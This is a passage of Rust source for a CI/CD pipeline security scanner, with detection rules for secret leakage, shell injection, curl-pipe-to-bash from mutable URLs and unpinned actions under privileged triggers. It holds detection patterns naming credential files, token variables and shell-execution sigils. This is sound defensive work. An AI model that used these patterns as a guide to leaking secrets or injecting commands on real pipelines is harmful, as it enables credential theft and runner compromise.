|| lower.contains("$(agent.tempdirectory)")
{
return true;
}
// Common credential / config file extensions
const RISKY_EXT: &[&str] = &[
".tfvars",
".env",
".hcl",
".pfx",
".key",
".pem",
".crt",
".p12",
".kubeconfig",
".jks",
".keystore",
];
RISKY_EXT.iter().any(|ext| lower.contains(ext))
}
/// Heuristic: returns true if `script` materialises `secret` to a workspace
/// file. Looks for a single line that contains the secret reference AND a
/// "write to file" sink AND a workspace/credfile path target.
///
/// Also detects the heredoc + Out-File pattern across multiple lines:
/// the secret appears inside a `@" ... "@` block whose final pipe is
/// `Out-File <workspace-path>`.
fn script_materialises_secret_to_file(script: &str, secret: &str) -> bool {
let needle = format!("$({secret})");
// Pass 1: single-line write. Catches `echo $(SECRET) > /tmp/x.env`,
// `Out-File ... $(SECRET) ...`, etc.
for line in script.lines() {
if line.contains(&needle)
&& line_writes_to_file(line)
&& line_references_workspace_path(line)
{
return true;
}
}
// Pass 2: PowerShell pattern `$X = "$(SECRET)"` followed by the variable
// being piped into Out-File / Set-Content with a workspace path. We
// detect this conservatively: if any line assigns `$x = "$(SECRET)"`
// AND any *later* line both writes-to-file and references a workspace
// path, we flag it. False-positive risk is low because the ASLR-style
// `$x` typically won't be reused for unrelated content within the same
// inline block.
let mut secret_bound_to_var = false;
for line in script.lines() {
let trimmed = line.trim();
if !secret_bound_to_var
&& trimmed.contains(&needle)
&& trimmed.starts_with('$')
&& trimmed.contains('=')
{
secret_bound_to_var = true;
continue;
}
if secret_bound_to_var && line_writes_to_file(line) && line_references_workspace_path(line)
{
return true;
}
}
false
}
/// Rule: pipeline secret materialised to a file under the agent workspace.
///
/// Severity: High. Files written under `$(System.DefaultWorkingDirectory)` /
/// `$(Build.SourcesDirectory)` survive the writing step's lifetime, are
/// uploaded by `PublishPipelineArtifact` tasks (sometimes accidentally), and
/// remain readable by every subsequent step in the same job.
pub fn secret_materialised_to_workspace_file(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let Some(script) = step.metadata.get(META_SCRIPT_BODY) else {
continue;
};
if script.is_empty() {
continue;
}
let secrets = step_secret_names(graph, step.id);
let materialised: Vec<String> = secrets
.into_iter()
.filter(|s| script_materialises_secret_to_file(script, s))
.collect();
if materialised.is_empty() {
continue;
}
let n = materialised.len();
let preview: String = materialised
.iter()
.take(3)
.map(|s| format!("$({s})"))
.collect::<Vec<_>>()
.join(", ");
let suffix = if n > 3 {
format!(", and {} more", n - 3)
} else {
String::new()
};
let secret_node_ids: Vec<NodeId> = graph
.edges_from(step.id)
.filter(|e| e.kind == EdgeKind::HasAccessTo)
.filter_map(|e| graph.node(e.to))
.filter(|n| n.kind == NodeKind::Secret && materialised.contains(&n.name))
.map(|n| n.id)
.collect();
let mut nodes_involved = vec![step.id];
nodes_involved.extend(secret_node_ids);
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::SecretMaterialisedToWorkspaceFile,
path: None,
nodes_involved,
message: format!(
"Step '{}' writes pipeline secret(s) {preview}{suffix} to a file under the agent workspace — the file persists for the rest of the job, is readable by every subsequent step, and may be uploaded by PublishPipelineArtifact",
step.name
),
recommendation: Recommendation::Manual {
action: "Replace inline secret materialisation with the `secureFile` task (downloaded to a temp dir with 0600 perms and auto-deleted), or pass the secret to the consuming tool over stdin / an env var instead of via a workspace file. If a file is unavoidable, write under `$(Agent.TempDirectory)` and `chmod 600` immediately.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Returns true if `script` contains a Key Vault → plaintext extraction
/// pattern that lands the secret in a non-`SecureString` variable.
fn script_extracts_keyvault_to_plaintext(script: &str) -> bool {
let lower = script.to_lowercase();
// New syntax: Get-AzKeyVaultSecret ... -AsPlainText
if lower.contains("get-azkeyvaultsecret") && lower.contains("-asplaintext") {
return true;
}
// ConvertFrom-SecureString ... -AsPlainText (PS 7+) — flat plaintext extraction
if lower.contains("convertfrom-securestring") && lower.contains("-asplaintext") {
return true;
}
// Old syntax: ($x = (Get-AzKeyVaultSecret ...).SecretValueText)
if lower.contains("get-azkeyvaultsecret") && lower.contains(".secretvaluetext") {
return true;
}
// Even older: BSTR pattern — ConvertToString on PtrToStringAuto
if lower.contains("get-azkeyvaultsecret") && lower.contains("ptrtostringauto") {
return true;
}
false
}
/// Rule: PowerShell pulls a Key Vault secret as plaintext inside an inline
/// script. The value never crosses the ADO variable-group boundary so
/// pipeline log masking does not apply — verbose `Az` / PowerShell logging
/// (`Set-PSDebug -Trace`, `$VerbosePreference = "Continue"`, error stack
/// traces) will print the cleartext credential.
///
/// Severity: Medium. Lower than the materialisation rules because the value
/// is at least kept in process memory (vs. on disk), but still a real
/// exposure path that pipeline-level secret rotation alone does not fix.
pub fn keyvault_secret_to_plaintext(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let Some(script) = step.metadata.get(META_SCRIPT_BODY) else {
continue;
};
if script.is_empty() {
continue;
}
if !script_extracts_keyvault_to_plaintext(script) {
continue;
}
findings.push(Finding {
severity: Severity::Medium,
category: FindingCategory::KeyVaultSecretToPlaintext,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' extracts a Key Vault secret as plaintext inside an inline script (-AsPlainText / .SecretValueText) — value bypasses ADO variable-group masking and is printed by Az verbose logging or any error stack trace",
step.name
),
recommendation: Recommendation::Manual {
action: "Keep the secret as a `SecureString`: drop `-AsPlainText`, pass the SecureString directly to cmdlets that accept it (e.g. `New-PSCredential`, `Connect-AzAccount -ServicePrincipal -Credential ...`), and only convert to plaintext at the moment of consumption, scoped to a single expression. For values that must be plaintext (REST calls, env vars) prefer ADO variable groups linked to Key Vault — the value then participates in pipeline log masking.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Returns true when `name` (case-insensitive) looks like a production
/// service-connection name. Matches `prod` / `production` / `prd` either as
/// the entire name, a token surrounded by `-`/`_`, or a leading/trailing
/// segment (`prod-foo`, `foo-prd`). Conservative: avoids matching
/// substrings like "approver" or "reproduce".
fn looks_like_prod_connection(name: &str) -> bool {
let lower = name.to_lowercase();
let token_match = |s: &str| {
lower == s
|| lower.contains(&format!("-{s}-"))
|| lower.contains(&format!("_{s}_"))
|| lower.ends_with(&format!("-{s}"))
|| lower.ends_with(&format!("_{s}"))
|| lower.starts_with(&format!("{s}-"))
|| lower.starts_with(&format!("{s}_"))
};
token_match("prod") || token_match("production") || token_match("prd")
}
/// Returns true when an inline script body looks like it laundering federated
/// SPN/OIDC token material into a pipeline variable via
/// `##vso[task.setvariable]`. Used to escalate addspn_with_inline_script's
/// message wording when explicit laundering is detected.
fn script_launders_spn_token(s: &str) -> bool {
let lower = s.to_lowercase();
if !lower.contains("##vso[task.setvariable") {
return false;
}
let token_markers = [
"$env:idtoken",
"$env:serviceprincipalkey",
"$env:serviceprincipalid",
"$env:tenantid",
"arm_oidc_token",
"arm_client_id",
"arm_client_secret",
"arm_tenant_id",
];
token_markers.iter().any(|m| lower.contains(m))
}
/// Rule: `terraform apply -auto-approve` against a production service
/// connection without an environment approval gate.
///
/// Combines three signals on a Step node:
/// 1. `META_TERRAFORM_AUTO_APPROVE` = "true" (set by the parser when an
/// inline script runs `terraform apply --auto-approve`, or a
/// `TerraformCLI@N` task has `command: apply` + commandOptions
/// containing `auto-approve`).
/// 2. `META_SERVICE_CONNECTION_NAME` matches a production-named pattern
/// (`prod`, `production`, `prd`), OR the step is linked via
/// `HasAccessTo` to an Identity service-connection node whose name
/// matches that pattern.
/// 3. The step is NOT inside an `environment:`-bound deployment job
/// (parser sets `META_ENV_APPROVAL` for those steps).
///
/// Severity: Critical. Bypasses the only ADO-side change-control on
/// infra rewrites.
pub fn terraform_auto_approve_in_prod(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let auto_approve = step
.metadata
.get(META_TERRAFORM_AUTO_APPROVE)
.map(|v| v == "true")
.unwrap_or(false);
if !auto_approve {
continue;
}
// Step's own service-connection name (set by parser from
// azureSubscription / connectedServiceName / etc).
let direct_conn = step.metadata.get(META_SERVICE_CONNECTION_NAME).cloned();
// Walk HasAccessTo edges to find a service-connection Identity. This
// catches steps that don't carry the name on themselves but inherit
// an Identity node via the parser's edge.
let edge_conn = graph
.edges_from(step.id)
.filter(|e| e.kind == EdgeKind::HasAccessTo)
.filter_map(|e| graph.node(e.to))
.find(|n| {
n.kind == NodeKind::Identity
&& n.metadata
.get(META_SERVICE_CONNECTION)
.map(|v| v == "true")
.unwrap_or(false)
})
.map(|n| n.name.clone());
let conn_name = match direct_conn.or(edge_conn) {
Some(n) if looks_like_prod_connection(&n) => n,
_ => continue,
};
// Compensating control: an `environment:` binding routes the apply
// through ADO's approval / check pipeline. Whether that environment
// *actually* has approvers configured is invisible from YAML — so
// downgrade Critical → Medium instead of skipping outright (the
// previous behaviour silently dropped the finding even when the
// environment was a CI-only approval-free passthrough).
let env_gated = step
.metadata
.get(META_ENV_APPROVAL)
.map(|v| v == "true")
.unwrap_or(false);
let (severity, suffix) = if env_gated {
(
Severity::Medium,
" — `environment:` binding present (verify approvers are configured in the ADO Environments UI)",
)
} else {
(
Severity::Critical,
" — any committer can rewrite prod infrastructure",
)
};
findings.push(Finding {
severity,
category: FindingCategory::TerraformAutoApproveInProd,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' runs `terraform apply -auto-approve` against production service connection '{}'{}",
step.name, conn_name, suffix
),
recommendation: Recommendation::Manual {
action: "Move the apply step into a deployment job whose `environment:` is configured with required approvers in ADO, OR remove `-auto-approve` and run apply behind a manual checkpoint task. Combine with a non-shared agent pool so committers cannot pre-stage payloads.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Rule: `AzureCLI@2` task with `addSpnToEnvironment: true` AND an inline
/// script body. The inline script can launder federated SPN material
/// (`$env:idToken`, `$env:servicePrincipalKey`, `$env:tenantId`) into normal
/// pipeline variables via `##vso[task.setvariable]`, leaking OIDC tokens to
/// downstream tasks/artifacts un-masked.
///
/// Severity: High. Escalates message wording when the script body contains
/// explicit laundering patterns (`##vso[task.setvariable ...]` writing one
/// of the well-known token env vars or `ARM_OIDC_TOKEN`).
pub fn addspn_with_inline_script(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let add_spn = step
.metadata
.get(META_ADD_SPN_TO_ENV)
.map(|v| v == "true")
.unwrap_or(false);
if !add_spn {
continue;
}
let body = match step.metadata.get(META_SCRIPT_BODY) {
Some(b) if !b.trim().is_empty() => b,
_ => continue,
};
let launders = script_launders_spn_token(body);
let suffix = if launders {
" — explicit token laundering detected (##vso[task.setvariable] writes federated token material)"
} else {
""
};
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::AddSpnWithInlineScript,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' runs an inline script with addSpnToEnvironment:true — the federated SPN (idToken/servicePrincipalKey/tenantId) is exposed to script-controlled code and can be exfiltrated via setvariable{}",
step.name, suffix
),
recommendation: Recommendation::Manual {
action: "Replace the inline script with `scriptPath:` pointing to a reviewed file in-repo, OR drop `addSpnToEnvironment: true` and use the task's first-class auth surface. Never emit federated token material via `##vso[task.setvariable]` — those values are inherited by every downstream task and may appear in logs.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Rule: free-form `type: string` parameter (no `values:` allowlist)
/// interpolated via `${{ parameters.<name> }}` directly into an inline
/// shell/PowerShell script body. ADO does not escape parameter values in
/// YAML emission, so any user with "queue build" can inject shell.
///
/// Detection requires the parser to populate
/// `AuthorityGraph::parameters` (currently ADO only) and to stamp Step
/// nodes with `META_SCRIPT_BODY`.
///
/// Severity: Medium.
pub fn parameter_interpolation_into_shell(graph: &AuthorityGraph) -> Vec<Finding> {
if graph.parameters.is_empty() {
return Vec::new();
}
// Free-form string parameters: type is `string` (or unspecified — ADO's
// default) AND no `values:` allowlist.
let free_form: Vec<&str> = graph
.parameters
.iter()
.filter(|(_, spec)| {
!spec.has_values_allowlist
&& (spec.param_type.is_empty() || spec.param_type.eq_ignore_ascii_case("string"))
})
.map(|(name, _)| name.as_str())
.collect();
if free_form.is_empty() {
return Vec::new();
}
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let body = match step.metadata.get(META_SCRIPT_BODY) {
Some(b) if !b.is_empty() => b,
_ => continue,
};
// Find every free-form parameter that appears interpolated in the
// script body. Match both `${{ parameters.X }}` and `${{parameters.X}}`.
let mut hits: Vec<&str> = Vec::new();
for &name in &free_form {
let needle_a = format!("${{{{ parameters.{name} }}}}");
let needle_b = format!("${{{{parameters.{name}}}}}");
if body.contains(&needle_a) || body.contains(&needle_b) {
hits.push(name);
}
}
if hits.is_empty() {
continue;
}
hits.sort();
hits.dedup();
let names = hits.join(", ");
findings.push(Finding {
severity: Severity::Medium,
category: FindingCategory::ParameterInterpolationIntoShell,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' interpolates free-form string parameter(s) [{}] into an inline script — anyone with 'queue build' permission can inject shell commands",
step.name, names
),
recommendation: Recommendation::Manual {
action: "Add a `values:` allowlist to the parameter declaration to constrain accepted inputs, OR pass the parameter through the step's `env:` block so the runtime quotes it as a shell variable instead of YAML-interpolating raw text.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Rule: ADO terraform-output → `task.setvariable` → downstream shell
/// expansion, a 2-step injection chain.
///
/// **Phase 1 (capture step):** an inline ADO script body
/// (`META_SCRIPT_BODY`) that contains BOTH:
/// - a "terraform output capture" signal — either a literal `terraform
/// output` CLI invocation (with or without `-raw <name>` / `-json`),
/// OR a reference to a `TF_OUT_*` env var (the standard naming
/// convention for env vars sourced from a `TerraformCLI@*`
/// `command: output` task), AND
/// - a `##vso[task.setvariable variable=NAME ...]VALUE` directive.
///
/// **Phase 2 (sink step):** a *later* Step in the SAME job (matched via
/// `META_JOB_NAME`) whose script body expands `$(NAME)` in
/// shell-expansion position, where "shell-expansion position" is any of:
/// - inside `bash -c "..."` / `bash -c '...'`
/// - inside `eval "..."` / `eval '...'` / `eval $(...)`
/// - inside command substitution `$(... $(NAME) ...)`
/// - PowerShell `-split` / `Invoke-Command` / `Invoke-Expression` / `iex`
/// in the same script
/// - bare unquoted `$(NAME)` as a command word (line-leading)
///
/// **Severity: High.** Terraform state/outputs are often controlled by
/// remote backends (S3 bucket, Azure Storage) whose IAM may have weaker
/// access controls than the pipeline itself. The `task.setvariable` hop
/// launders attacker-controlled state through pipeline-variable space —
/// existing rules see only the in-step view.
pub fn terraform_output_via_setvariable_shell_expansion(graph: &AuthorityGraph) -> Vec<Finding> {
// Step 0: collect every Step (in graph insertion order, which matches
// YAML order) that carries a non-empty script body. Group by job name.
struct StepInfo<'a> {
id: NodeId,
name: &'a str,
body: &'a str,
}
let mut by_job: std::collections::BTreeMap<&str, Vec<StepInfo<'_>>> =
std::collections::BTreeMap::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let body = match step.metadata.get(META_SCRIPT_BODY) {
Some(b) if !b.is_empty() => b.as_str(),
_ => continue,
};
let job = step
.metadata
.get(META_JOB_NAME)
.map(String::as_str)
.unwrap_or("");
by_job.entry(job).or_default().push(StepInfo {
id: step.id,
name: step.name.as_str(),
body,
});
}
let mut findings = Vec::new();
for (_job_name, steps) in by_job.iter() {
// Phase 1: scan every step in this job for capture+setvariable.
// Each capture step yields zero-or-more (variable_name) outputs.
let captures: Vec<(usize, Vec<String>)> = steps
.iter()
.enumerate()
.filter_map(|(idx, s)| {
let vars = capture_phase_variables(s.body);
if vars.is_empty() {
None
} else {
Some((idx, vars))
}
})
.collect();
if captures.is_empty() {
continue;
}
// Phase 2: for each capture step, look at all later steps in the
// same job. For each later step, find any captured variable name
// whose `$(NAME)` reference appears in shell-expansion position
// within that later step's body.
for (cap_idx, vars) in &captures {
for later_idx in (cap_idx + 1)..steps.len() {
let sink = &steps[later_idx];
let mut hits: Vec<&str> = Vec::new();
for var in vars {
if expansion_in_shell_position(sink.body, var) {
hits.push(var.as_str());
}
}
if hits.is_empty() {
continue;
}
hits.sort();
hits.dedup();
let cap = &steps[*cap_idx];
let names = hits.join(", ");
findings.push(Finding {
severity: Severity::High,
category:
FindingCategory::TerraformOutputViaSetvariableShellExpansion,
path: None,
nodes_involved: vec![cap.id, sink.id],
message: format!(
"Step '{}' captures terraform output and emits ##vso[task.setvariable] for [{}]; later step '{}' (same job) expands $({}) in shell-expansion position — attacker control of terraform state ({{S3, Azure Storage}} backend) becomes shell injection across the pipeline-variable hop",
cap.name,
names,
sink.name,
hits[0],
),
recommendation: Recommendation::Manual {
action: "Pass the captured value through the downstream step's `env:` block (so the runtime quotes it as a shell variable: `env: { GDSVMS: $(gdsvms) }` then `$GDSVMS` in script) instead of YAML-interpolating `$(VAR)` into the script body. Where the value is structured (comma list of VM names), validate the shape — e.g. `[[ \"$VAR\" =~ ^[a-zA-Z0-9._,-]+$ ]]` — before splitting/looping. Consider lock-down of the terraform state backend (S3 bucket policy, Azure Storage RBAC) so untrusted parties cannot rewrite outputs.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
}
}
findings
}
/// Phase-1 helper: given an inline-script body, return the list of
/// pipeline-variable names that the body sets via
/// `##vso[task.setvariable variable=NAME ...]` *only when* the body also
/// contains a "terraform output capture" signal.
///
/// We do not attempt to data-flow-link the captured value to the
/// `setvariable` directive — the proximity within a single inline script
/// is the operative signal. The two corpus exemplars
/// (`sharedservice-solarwinds` and `userapp-mvit-prd`) both pair the
/// capture and the setvariable inside the same PowerShell block.
fn capture_phase_variables(body: &str) -> Vec<String> {
if !body_has_terraform_output_capture(body) {
return Vec::new();
}
setvariable_names_in(body)
}
/// True iff the body contains a terraform-output capture signal.
fn body_has_terraform_output_capture(body: &str) -> bool {
// Literal CLI invocation, with or without subcommand args. We check
// case-sensitive because terraform CLI is always lowercase.
if body.contains("terraform output") {
return true;
}
// Env-var convention used by the `TerraformCLI@*` task family
// (`command: output` writes results into `TF_OUT_<name>` env vars
// surfaced into the next step). PowerShell form: `$env:TF_OUT_X`.
// POSIX form: `$TF_OUT_X` or `${TF_OUT_X}`.
if body.contains("$env:TF_OUT_") || body.contains("${env:TF_OUT_") {
return true;
}
// POSIX shell. Use a manual scan — we want to match `$TF_OUT_X` and
// `${TF_OUT_X}` but avoid matching arbitrary substrings like
// `MY_TF_OUT_X` that aren't a variable expansion.
for marker in ["$TF_OUT_", "${TF_OUT_"] {
if body.contains(marker) {
return true;
}
}
false
}
/// Extract the variable names set by every
/// `##vso[task.setvariable variable=NAME ...]` directive in the body.
/// Tolerates whitespace and either `;` or `]` as the variable= terminator.
fn setvariable_names_in(body: &str) -> Vec<String> {
let needle = "##vso[task.setvariable variable=";
let mut out: Vec<String> = Vec::new();
let mut cursor = 0;
while let Some(rel) = body[cursor..].find(needle) {
let start = cursor + rel + needle.len();
let tail = &body[start..];
let end = tail
.find(|c: char| c == ';' || c == ']' || c.is_whitespace())
.unwrap_or(tail.len());
let name = tail[..end].trim().to_string();
if !name.is_empty()
&& name
.chars()
.all(|c| c.is_ascii_alphanumeric() || c == '_' || c == '.')
{
out.push(name);
}
cursor = start + end;
}
out.sort();
out.dedup();
out
}
/// Phase-2 predicate: does `body` reference `$(name)` in a shell-expansion
/// position? "Shell-expansion position" means the value will be parsed by
/// a shell or PowerShell interpreter at runtime, rather than being fed
/// into a function/cmdlet that quotes its arguments.
fn expansion_in_shell_position(body: &str, name: &str) -> bool {
let needle = format!("$({name})");
if !body.contains(&needle) {
return false;
}
// Cheap whole-body checks: if the script contains any of these
// primitives anywhere, an interpolation of `$(name)` elsewhere in the
// same script is at risk. The `sharedservice-solarwinds` corpus
// exemplar exercises the `-split` + `Invoke-Command` + foreach branch
// — all three signals fire.
let sigil_set: &[&str] = &[
"bash -c",
"sh -c",
"eval ",
"Invoke-Expression",
" iex ",
"iex(",
"iex (",
"Invoke-Command",
"-split",
];
if sigil_set.iter().any(|s| body.contains(s)) {
return true;
}
// Nested command substitution: `$(... $(name) ...)`. We look for any
// `$(` occurring strictly before the first `$(name)` — ADO's
// `$(macro)` and POSIX `$(cmd)` share the same surface syntax, but
// any `$(` *outside* the `$(name)` itself, on the same line, indicates
// the sink is being parsed inside another command substitution.
for (line_no, line) in body.lines().enumerate() {
let _ = line_no;
if let Some(pos) = line.find(&needle) {
// Search the prefix for an unclosed `$(`. Naive but adequate
// for inline-script bodies (we don't attempt to balance).
let prefix = &line[..pos];
let opens = prefix.matches("$(").count();
let closes = prefix.matches(')').count();
if opens > closes {
return true;
}
}
}
// Bare unquoted line-leading reference: `$(NAME) ...` with no
// surrounding quotes — the value is parsed as a command line.
for line in body.lines() {
let trimmed = line.trim_start();
if trimmed.starts_with(&needle) {
// Skip the obvious assignment-to-variable forms that quote.
// PowerShell `$x = "$(name)"` and POSIX `X="$(name)"` keep
// the value out of the command position.
return true;
}
}
false
}
/// Run all rules against a graph.
// ── runtime_script_fetched_from_floating_url ──────────────────
//
// Detect `run:` blocks that download a remote script from a non-pinned URL
// and pipe it directly to a shell interpreter. This is a pure HTTP supply-chain
// vector — neither `unpinned_action` (which inspects `uses:`) nor
// `floating_image` (containers) covers it.
//
// Detection primitive (URL must be both):
// 1. shell-style fetch+execute: `curl … | bash`, `wget … | sh`,
// `bash <(curl …)`, or `deno run https://…`
// 2. URL is mutable: contains `refs/heads/`, `/main/`, `/master/`,
// `/develop/`, `/HEAD/`, OR is a raw `git clone`/`fetch` from a
// branch URL with no version pin.
//
// Severity: High (one upstream commit lands code on every consumer).
fn body_has_pipe_to_shell_with_floating_url(body: &str) -> bool {
// Cheap pre-filter to keep the regex-free scan fast.
let lower = body;
let has_curl_or_wget = lower.contains("curl") || lower.contains("wget");
let has_pipe_shell = lower.contains("| bash")
|| lower.contains("|bash")
|| lower.contains("| sh")
|| lower.contains("|sh")
|| lower.contains("<(curl")
|| lower.contains("<(wget");
let has_deno_remote = lower.contains("deno run http://") || lower.contains("deno run https://");
if !((has_curl_or_wget && has_pipe_shell) || has_deno_remote) {
return false;
}
// For each line that contains a fetch+pipe or a deno-remote run, check
// whether the URL on that line is mutable.
for line in body.lines() {
let line_has_pipe_shell = line.contains("| bash")
|| line.contains("|bash")
|| line.contains("| sh")
|| line.contains("|sh")
|| line.contains("<(curl")
|| line.contains("<(wget");
let line_has_deno_remote =
line.contains("deno run http://") || line.contains("deno run https://");
if !(line_has_pipe_shell || line_has_deno_remote) {
continue;
}
if line_url_is_mutable(line) {
return true;
}
}
false
}
fn line_url_is_mutable(line: &str) -> bool {
// Mutable URL markers.
const MUTABLE_PATHS: &[&str] = &[
"refs/heads/",
"/HEAD/",
"/main/",
"/master/",
"/develop/",
"/trunk/",
"/latest/",
];
for marker in MUTABLE_PATHS {
if line.contains(marker) {
return true;
}
}
// Bare `raw.githubusercontent.com/<owner>/<repo>/<ref>/...` where <ref>
// is the literal `main`/`master` segment was caught above. We could be
// looser and flag any URL with no version-like segment, but that
// sacrifices precision — the marker list above is the conservative core.
false
}
/// Rule: a `run:` step pipes a remotely-fetched script into a shell, where
/// the URL is pinned to a mutable branch ref. The remote host's branch tip
/// becomes a write-anywhere primitive on the runner.
///
/// Severity: High.
pub fn runtime_script_fetched_from_floating_url(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let body = match step.metadata.get(META_SCRIPT_BODY) {
Some(b) if !b.is_empty() => b,
_ => continue,
};
if !body_has_pipe_to_shell_with_floating_url(body) {
continue;
}
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::RuntimeScriptFetchedFromFloatingUrl,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' downloads and executes a script from a mutable URL (curl|bash, wget|sh, or `deno run` against a branch ref) — whoever controls that branch executes arbitrary code on the runner",
step.name
),
recommendation: Recommendation::Manual {
action: "Pin the URL to a release tag or commit SHA (e.g. .../v1.2.3/install.sh) and verify the download against a known checksum before executing it. Avoid `curl … | bash` entirely where possible — fetch to a file, inspect, then run.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
// ── pr_trigger_with_floating_action_ref ────────────────────────
//
// Detect the high-severity conjunction: workflow runs in privileged base-repo
// context (`pull_request_target` / `issue_comment` / `workflow_run`) AND uses
// at least one action by mutable ref (not SHA). Either condition alone is a
// finding from another rule; the conjunction is critical because the trigger
// grants write-token authority *and* the floating action lets an attacker
// substitute the executed code.
fn trigger_is_privileged_pr_class(trigger: &str) -> bool {
// META_TRIGGER may be a single trigger or a comma-separated list.
trigger.split(',').any(|t| {
let t = t.trim();
matches!(t, "pull_request_target" | "issue_comment" | "workflow_run")
})
}
/// Rule: privileged PR-class trigger combined with a non-SHA-pinned action ref.
///
/// Severity: Critical (full repo write token + attacker-controlled action code).
pub fn pr_trigger_with_floating_action_ref(graph: &AuthorityGraph) -> Vec<Finding> {
let trigger = match graph.metadata.get(META_TRIGGER) {
Some(t) => t.as_str(),
None => return Vec::new(),
};
if !trigger_is_privileged_pr_class(trigger) {
return Vec::new();
}
let mut findings = Vec::new();
let mut seen = std::collections::HashSet::new();
for image in graph.nodes_of_kind(NodeKind::Image) {
// Skip first-party (local actions, self-hosted runner labels).
if image.trust_zone == TrustZone::FirstParty {
continue;
}
// Skip container images (covered by floating_image).
if image
.metadata
.get(META_CONTAINER)
.map(|v| v == "true")
.unwrap_or(false)
{
continue;
}
// Skip self-hosted-runner Image nodes (those are FirstParty anyway,
// but be defensive against future refactors).
if image.metadata.contains_key(META_SELF_HOSTED) {
continue;
}
// Already SHA-pinned → safe.
if is_sha_pinned(&image.name) {
continue;
}
// Dedupe per action reference.
if !seen.insert(&image.name) {
continue;
}
findings.push(Finding {
severity: Severity::Critical,
category: FindingCategory::PrTriggerWithFloatingActionRef,
path: None,
nodes_involved: vec![image.id],
message: format!(
"Workflow trigger '{trigger}' runs in privileged base-repo context and step uses unpinned action '{}' — anyone who can push to that action's branch executes arbitrary code with full repo write token",
image.name
),
recommendation: Recommendation::PinAction {
current: image.name.clone(),
pinned: format!(
"{}@<sha256-digest>",
image.name.split('@').next().unwrap_or(&image.name)
),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
// ── untrusted_api_response_to_env_sink ────────────────────────
//
// Detect `workflow_run` consumer workflows that capture an external API
// response (gh CLI, curl against api.github.com) and write it into the GHA
// environment file. A poisoned API field (branch name, PR title, commit
// message) injects environment variables into every subsequent step in the
// same job.
fn body_writes_api_response_to_env_sink(body: &str) -> bool {
// First, the sink: a redirect to one of the GHA gate files.
let writes_env_sink = body.contains("$GITHUB_ENV")
|| body.contains("${GITHUB_ENV}")
|| body.contains("$GITHUB_OUTPUT")
|| body.contains("${GITHUB_OUTPUT}")
|| body.contains("$GITHUB_PATH")
|| body.contains("${GITHUB_PATH}");
if !writes_env_sink {
return false;
}
// Then, an API source on the same body: gh CLI or a direct REST call.
let calls_api = body.contains("gh pr view")
|| body.contains("gh pr list")
|| body.contains("gh api ")
|| body.contains("gh issue view")
|| body.contains("api.github.com");
if !calls_api {
return false;
}
// Tier-1 precision: same-line conjunction (the canonical case in corpus,
// e.g. `gh pr view --jq '"PR_NUMBER=\(.number)"' >> $GITHUB_ENV`).
let lines: Vec<&str> = body.lines().collect();
for line in &lines {
let line_calls_api = line.contains("gh pr view")
|| line.contains("gh pr list")
|| line.contains("gh api ")
|| line.contains("gh issue view")
|| line.contains("api.github.com");
let line_writes_sink = line.contains("$GITHUB_ENV")
|| line.contains("${GITHUB_ENV}")
|| line.contains("$GITHUB_OUTPUT")
|| line.contains("${GITHUB_OUTPUT}")
|| line.contains("$GITHUB_PATH")
|| line.contains("${GITHUB_PATH}");
if line_calls_api && line_writes_sink {
return true;
}
}
// Tier-2 precision: API call captures into a variable, and a *nearby*
// line redirects that same variable to the env sink. Without dataflow,
// we approximate "nearby" as: an API line and a sink line within 6 lines
// of each other. This catches multi-step capture-then-write idioms while
// keeping false-positive risk acceptable.
let mut last_api_line: Option<usize> = None;
for (i, line) in lines.iter().enumerate() {
let line_calls_api = line.contains("gh pr view")
|| line.contains("gh pr list")
|| line.contains("gh api ")
|| line.contains("gh issue view")
|| line.contains("api.github.com");
if line_calls_api {
last_api_line = Some(i);
}
let line_writes_sink = line.contains("$GITHUB_ENV")
|| line.contains("${GITHUB_ENV}")
|| line.contains("$GITHUB_OUTPUT")
|| line.contains("${GITHUB_OUTPUT}")
|| line.contains("$GITHUB_PATH")
|| line.contains("${GITHUB_PATH}");
if line_writes_sink {
if let Some(api_idx) = last_api_line {
if i.saturating_sub(api_idx) <= 6 {
return true;
}
}
}
}
false
}
/// Rule: workflow_run-triggered workflow writes an API response value to the
/// GHA environment gate. Branch name / PR title in the response can carry
/// newline-injected env-var assignments.
///
/// Severity: High.
pub fn untrusted_api_response_to_env_sink(graph: &AuthorityGraph) -> Vec<Finding> {
let trigger = match graph.metadata.get(META_TRIGGER) {
Some(t) => t.as_str(),
None => return Vec::new(),
};
let trigger_in_scope = trigger.split(',').any(|t| {
let t = t.trim();
matches!(t, "workflow_run" | "pull_request_target" | "issue_comment")
});
if !trigger_in_scope {
return Vec::new();
}
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let body = match step.metadata.get(META_SCRIPT_BODY) {
Some(b) if !b.is_empty() => b,
_ => continue,
};
